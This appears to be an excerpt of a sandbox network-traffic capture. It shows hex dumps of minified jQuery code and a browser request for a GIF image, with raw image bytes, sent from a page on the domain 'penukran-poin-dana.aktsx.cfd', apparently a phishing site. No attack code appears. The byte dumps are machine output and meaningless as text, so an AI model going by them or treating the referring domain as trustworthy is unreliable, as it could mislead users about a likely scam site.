                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f 6e 63 65 7d 2c 6e 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72
                                                                                                                            Data Ascii: ect Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 2c 49 3d 22 28 3f 3a 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d
                                                                                                                            Data Ascii: .slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",I="(?:\\\\[\\da-fA-
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c 78 37 66 2d 5c 75 46 46 46 46 5c 77 2d 5d 2f 67 2c 69 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c
                                                                                                                            Data Ascii: \\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ie=function(e,
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28 65 29 7b 4e 28 74 2c 21 30 29 7d 66 69 6e 61 6c 6c 79 7b 73 3d 3d 3d 53 26 26 65 2e 72 65 6d
                                                                                                                            Data Ascii: de)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(e){N(t,!0)}finally{s===S&&e.rem
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 59 2e 74 65 73 74 28 74 7c 7c
                                                                                                                            Data Ascii: o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e.namespaceURI,n=(e.ownerDocument||e).documentElement;return!Y.test(t||
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d
                                                                                                                            Data Ascii: function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((n=o.getAttributeNode("id"))&&n.value=
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62
                                                                                                                            Data Ascii: ,e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='disabled'></a><select disabled='disab
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 74 29 3f 31 3a 75 3f 50 28 75 2c 65 29 2d 50 28 75 2c 74 29 3a 30 3a 34 26 6e 3f 2d 31 3a 31
                                                                                                                            Data Ascii: ocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p&&y(p,t)?1:u?P(u,e)-P(u,t):0:4&n?-1:1


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.2.649733172.217.18.14436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC920OUTGET /img/b/R29vZ2xl/AVvXsEgbD-mmuMUDwaeFMEz6NefivuQqHyrFXvXxqVxMhYRhR5wsfUhiWkPNkpxLKkagRNpJ2obIiZH_D9EK6tnHIJUFMVBOclZI98zrU7VPszAR5n-_GeSWNCNgnfH1MRWuL-ahhPjxsejyDa5yyWAaOMWXWT4jS4EngtdLLlXjaPakQoFIOsjyS6tfnEBHDlw/s16000/output-onlinegiftools.gif HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:07 UTC483INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/gif
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v145b"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:07 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="output-onlinegiftools.gif"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 325076
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-10-06 11:50:07 UTC907INData Raw: 47 49 46 38 39 61 58 02 75 00 f7 00 00 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b eb 0f 8b
                                                                                                                            Data Ascii: GIF89aXu
                                                                                                                            2024-10-06 11:50:07 UTC1390INData Raw: cb 97 30 63 ca 9c 49 b3 a6 cd 9b 38 73 ea dc c9 b3 a7 cf 9f 40 83 0a 1d 4a b4 a8 d1 a3 48 93 2a 5d ca b4 a9 d3 a7 50 a3 4a 9d 4a b5 aa d5 ab 58 b3 6a dd ca b5 ab d7 af 60 c3 8a 1d 4b b6 ac d9 b3 68 d3 aa 5d cb b6 ad db b7 70 e3 ca 9d 4b b7 ae dd bb 78 f3 b6 45 c3 b7 cd a6 7f ff fc f1 db 47 58 1f 3f 7e fd 30 b5 41 b3 46 af e3 c7 90 a5 ea f1 1b 58 b0 3f 53 a9 f6 d5 ab 17 4d 5a 34 75 d4 56 ad da 67 f8 b0 26 4b 8e 22 ab 5e cd 9a e7 9b 4b fd a2 01 03 96 4a f4 2a 77 ea 52 a5 3a 75 ca 94 ef 71 e3 96 0d 13 3e 0c 19 b2 65 a6 36 49 2a d3 ba b9 f3 e7 26 cb 54 c2 74 4a d7 29 5b bb 79 9f 92 d5 4b 16 2e 5c a5 4a fe 81 07 1e 7c 99 71 e3 c3 97 2d 93 b6 ef 1f 1d e8 f0 e3 cb 97 b8 66 93 bf 7e fb 6c dd 9a dd 59 9a b4 6a d5 0c 33 8e 77 b2 94 62 0a 79 ea 49 a3 9e 79 fe 29 38
                                                                                                                            Data Ascii: 0cI8s@JH*]PJJXj`Kh]pKxEGX?~0AFX?SMZ4uVg&K"^KJ*wR:uq>e6I*&TtJ)[yK.\J|q-f~lYj3wbyIy)8
                                                                                                                            2024-10-06 11:50:07 UTC1390INData Raw: 43 a6 68 30 00 5d 73 8b e3 54 59 34 42 a4 09 a9 79 f5 af 70 d1 83 3f d4 a8 ac 10 c1 63 54 55 6c 12 11 d1 71 2a 6a dc e3 21 6d 48 aa aa 92 2a a5 4a 10 c2 21 ab 10 5e c1 ec 8a 8e a5 8e c8 91 d2 50 c5 3e c4 08 d8 d2 ae c5 12 fd 48 47 89 c4 91 46 11 e5 12 71 f1 5c fe 87 43 ee d0 8f 24 55 29 ac e3 d8 47 6a 0c 32 06 83 1c 0c 55 5a 44 9d 67 41 74 58 a5 96 c2 b4 c8 45 cb 18 14 09 1c b8 39 4d 1a f4 c0 df 2e 49 47 0d 55 10 e4 51 ff 00 c5 5f fe 82 09 0d f9 c3 16 b8 60 57 3d 9a ba 8f c4 74 f7 bc fe 48 2f 69 67 90 0a b4 15 ec 94 c3 1d 51 1a 69 51 0a 32 25 f7 be 62 19 43 34 0e 34 8e 86 d2 63 1d 8e 94 ee d9 46 56 27 82 58 62 1f b2 50 11 79 36 c3 37 e0 a4 e2 8b f1 92 c5 60 54 b9 20 3c 21 03 14 04 41 05 55 65 41 30 ce c6 57 65 f5 38 92 8f f0 4b e2 ae 60 c2 3a 0d 85 a4 61
                                                                                                                            Data Ascii: Ch0]sTY4Byp?cTUlq*j!mH*J!^P>HGFq\C$U)Gj2UZDgAtXE9M.IGUQ_`W=tH/igQiQ2%bC44cFV'XbPy67`T <!AUeA0We8K`:a
                                                                                                                            2024-10-06 11:50:07 UTC1390INData Raw: 0a c8 d0 0f ae 36 10 43 b2 22 c8 88 0f b1 a3 8e 8f 50 08 89 80 09 3d b3 8f f3 b7 79 e8 90 4d 2b 19 0b a1 07 93 5c c9 10 68 00 1c 0e 63 93 e9 02 0e df a8 38 56 46 08 72 35 24 a5 10 31 ab a0 89 cb b8 0f 7c 58 06 e9 75 18 9b d1 2e e9 a0 0a f8 80 61 03 61 22 99 a7 84 ba 54 25 f8 d0 0b a7 10 78 5d 59 98 0b d1 0f fa 40 0b b6 70 2c 0a 59 0e 64 53 0e 20 38 32 e8 90 0a 04 61 46 a5 a0 0b 9a 43 1a 93 77 58 fd 00 09 f6 95 75 de c5 22 ac 14 29 aa 40 0d eb 45 0f 57 34 6f 55 79 87 ac c0 0a 37 d4 0b 43 67 98 b2 69 10 9a 60 24 b8 30 0e eb 00 27 0b a9 2c 66 59 49 bd 26 10 e0 c4 1b db b7 22 fb b0 88 e3 70 24 f7 f0 0f 1a 22 76 47 92 0a 2c d2 2e a9 80 0f f7 b0 83 04 11 6f 7d b9 4b 20 18 4f da fe 60 0b b1 39 9b de 39 03 1a 72 24 4c b3 36 fd d5 81 c4 47 87 e9 42 0d bf 39 03 c1
                                                                                                                            Data Ascii: 6C"P=yM+\hc8VFr5$1|Xu.aa"T%x]Y@p,YdS 82aFCwXu")@EW4oUy7Cgi`$0',fYI&"p$"vG,.o}K O`99r$L6GB9
                                                                                                                            2024-10-06 11:50:07 UTC1390INData Raw: f2 7e 69 c3 4b 96 4c 3c 45 fc b3 c0 fc b3 ca f2 3a 64 7b 0f f6 b0 c8 db 7c a0 a0 a0 0f c7 e2 79 03 a3 23 3f fb ca e5 2c ce f2 2b 54 8e 89 ac 9f 16 0a 6e fc ce 07 8a 09 a4 32 0c c7 d3 6d c4 25 5d d4 3c bf 8e 19 54 42 35 8a d4 c0 66 c1 e1 09 46 2a d0 07 ea 09 fa 80 0c 0b 48 0d 0c 86 0f 0a 4d 96 30 34 8b c5 03 2c e7 b2 0e 07 2c ce 5c 38 fe 22 d1 a0 0a f0 00 0a 01 6d d1 34 da 06 57 02 2d 9d 88 0f 54 32 c1 63 e9 33 e3 a2 71 b9 e6 2b 5d 78 cf 20 23 5c d1 80 0c f5 20 09 54 0b d3 56 da 08 fe 50 ad 9b 21 86 4b 75 93 0b 7d 2a 16 99 c6 11 05 32 f5 a8 73 c8 c0 0f 15 8d d4 78 aa 07 f1 5c 0a f8 40 0b bb f0 d4 39 4d cd 8b d5 9a 6a a3 0a 50 d4 8a e3 65 0a 8f d0 07 a2 cc d5 78 6a 79 9e c0 0f 85 e2 6d 78 34 2e 79 4d 3c 3f d5 50 23 32 cb 53 b5 0c e5 f0 26 e3 a0 0f a0 e0 78
                                                                                                                            Data Ascii: ~iKL<E:d{|y#?,+Tn2m%]<TB5fF*HM04,,\8"m4W-T2c3q+]x #\ TVP!Ku}*2sx\@9MjPexjymx4.yM<?P#2S&x
                                                                                                                            2024-10-06 11:50:07 UTC1390INData Raw: 9b 38 73 ea dc c9 b3 a7 cf 9f 40 83 0a 1d 4a b4 a8 d1 a3 48 93 2a 5d ca b4 a9 d3 a7 50 a3 4a 9d 4a b5 aa d5 ab 58 b3 6a dd ca b5 ab d7 af 60 c3 8a 1d 4b b6 ac d9 b3 68 d3 aa 5d cb b6 ad db b7 70 e3 ca 9d 4b b7 ae dd bb 78 f3 b6 9d 33 47 0e 9e 4d fe fc f5 bb 47 af f0 bc 7b f7 f0 5d aa 53 67 8e de c7 90 23 4b 1d f4 37 f0 60 7d a2 52 d1 4b 35 8f db 37 6e e1 c4 9d d2 4c 2f 5f 3e 7d 9a 26 15 92 cc ba b5 6b 9e 7c 2e e1 e3 66 cd 5a aa db a9 c6 b1 4a 25 aa f7 30 51 c3 94 29 bb 76 ad 76 ed 6c d7 44 69 f2 e3 e6 b5 f3 e7 d0 4d be c1 83 49 d4 29 52 99 7b f7 36 95 ca 54 a9 52 a1 42 fe 81 17 3e 9c 78 36 e4 d6 a6 5d d3 f6 8d 1e 27 39 d1 e3 cb 9f 2f b1 ce a6 7f 88 49 91 aa ed f9 db 37 69 d2 58 a3 8c 29 04 86 47 5e 79 df 10 e7 9f 7f c6 99 a2 cf 26 75 d0 27 e1 84 12 d6 81
                                                                                                                            Data Ascii: 8s@JH*]PJJXj`Kh]pKx3GMG{]Sg#K7`}RK57nL/_>}&k|.fZJ%0Q)vvlDiMI)R{6TRB>x6]'9/I7iX)G^y&u'
                                                                                                                            2024-10-06 11:50:07 UTC1390INData Raw: 43 58 31 21 8c d4 79 54 15 9c bc 66 8a b8 31 8f ce 4d f5 b0 8f b9 84 7f e4 d4 4e ac 2a 6b 91 5d 15 86 23 06 d0 90 4a 64 33 59 ea b8 c6 3b fc d8 90 37 50 0b 69 1f 4d e2 34 9c 65 39 6f 71 e3 1d 7e 00 00 62 57 6b 17 c5 5e 4a 18 48 1a fe 95 b1 18 d7 36 55 94 e8 21 72 08 1c ad bc 25 1c 46 50 b6 21 e4 80 06 68 55 31 db 20 82 14 62 1d 72 c7 b0 34 61 52 d6 3a f7 2d 83 78 a1 3b 06 85 24 d1 de 2f 56 e1 70 c7 43 f0 a0 dc 54 9c 02 5c c2 a9 c4 01 1c 92 0a 69 0c b7 b8 5a 45 52 f8 3a 94 c2 e7 ba b7 2d 95 e8 07 39 d4 61 b9 62 de af b6 23 72 08 20 f2 c1 d2 71 a4 c8 49 f4 68 c4 41 da 60 90 45 c9 b3 15 a0 1c ed 2e d2 4b df 18 3d ed 13 ef 8d 70 5a 38 71 0f e1 a4 c8 be d7 e5 d6 30 08 f2 4f 7f 3c 28 30 fe 70 21 35 49 51 8a ad c6 43 73 f4 b8 c7 3f 56 cc e2 7f f4 e3 1f 80 20 c8
                                                                                                                            Data Ascii: CX1!yTf1MN*k]#Jd3Y;7PiM4e9oq~bWk^JH6U!r%FP!hU1 br4aR:-x;$/VpCT\iZER:-9ab#r qIhA`E.K=pZ8q0O<(0p!5IQCs?V
                                                                                                                            2024-10-06 11:50:07 UTC1390INData Raw: 54 f6 09 ee e0 25 ab 80 1b 24 43 65 72 98 10 a2 73 0f 73 73 62 45 a6 0d a6 d0 09 a1 90 0a b9 94 82 d4 08 3b c6 32 58 f1 d0 30 6c b6 93 68 09 11 72 00 8f a6 80 0a 62 38 94 fb 62 44 6b 77 8b bb 40 32 7e 74 00 78 80 18 d6 c1 1b aa 10 0b a2 90 0d f9 b0 71 1f f8 0f 95 e2 8f 1e f2 0d 21 f9 6d 85 80 09 28 98 8a 52 58 8d bb 30 58 ef 40 0b ab c0 7d 69 79 99 0c 21 07 4c f8 96 ad 80 8a a4 72 94 17 d9 36 a9 10 00 bf 75 3c 5d 79 1b 4f 15 90 b0 f8 06 2b 86 18 29 f2 2f e4 30 0c f1 f0 65 02 41 0e 75 a2 7a 8f e9 88 dd a2 22 a2 70 7f 98 f9 9b 0b 91 0f f3 60 0a a4 60 2d 29 43 94 a4 32 97 ad b3 0b a9 40 10 f4 18 0a df 95 71 87 a1 0f e1 83 0f 90 a0 79 f4 87 09 fa fe a0 0f ef 10 0f 96 42 37 e1 20 98 24 42 7d 2b c8 8a bb 80 2c 53 13 0a c0 b9 9e 09 b1 09 34 53 0a ca 50 0e 1a 42
                                                                                                                            Data Ascii: T%$CersssbE;2X0lhrb8bDkw@2~txq!m(RX0X@}iy!Lr6u<]yO+)/0eAuz"p``-)C2@qyB7 $B}+,S4SPB
                                                                                                                            2024-10-06 11:50:07 UTC1390INData Raw: c5 ae 33 44 13 e3 cc bb c7 82 aa c0 36 4d ca 48 8c f4 38 b6 d0 0b df a0 1f 1e d8 cd ec d9 09 f3 70 0d d2 a0 45 c1 c8 3d e5 5c 3f 09 b6 ce a6 f6 ce ec 3c 32 1a 73 28 ab 8a cf 18 ba 85 dc 20 2c 7d 95 2d fe 63 cd 8e b3 ce 57 5c c9 78 7a c5 22 a3 31 ab b0 0a 9d a0 70 0c bd 9e 6d 40 4d 46 dc 60 a9 37 5c e7 6c fe 41 a9 42 d0 b6 50 9f b0 33 28 e6 19 9b d9 10 0a a4 19 d2 18 fa 69 d2 c0 8e a0 51 0e 22 43 c3 15 bd 7b 57 0c 3b d2 68 d0 d2 f8 3d 84 26 0a 28 c2 cd 36 3d a4 9c 40 0f 96 93 4b 86 92 34 24 83 c2 f2 6c 6a 41 0d 39 43 1d a2 c6 44 38 bf 73 29 ef e0 09 bd bc d4 43 3a 08 97 40 22 5a 62 28 81 ab 86 34 99 cb 81 f5 46 f5 29 cf c4 54 44 94 16 0e a6 34 1c 9d 20 a8 62 4d a9 fa 9c 0d ab f0 22 29 12 43 5b 05 b2 76 04 9a 6d 3d 0d f9 52 0e 49 89 d5 c9 6c 9e 20 c2 0d a5
                                                                                                                            Data Ascii: 3D6MH8pE=\?<2s( ,}-cW\xz"1pm@MF`7\lABP3(iQ"C{W;h=&(6=@K4$ljA9CD8s)C:@"Zb(4F)TD4 bM")C[vm=RIl
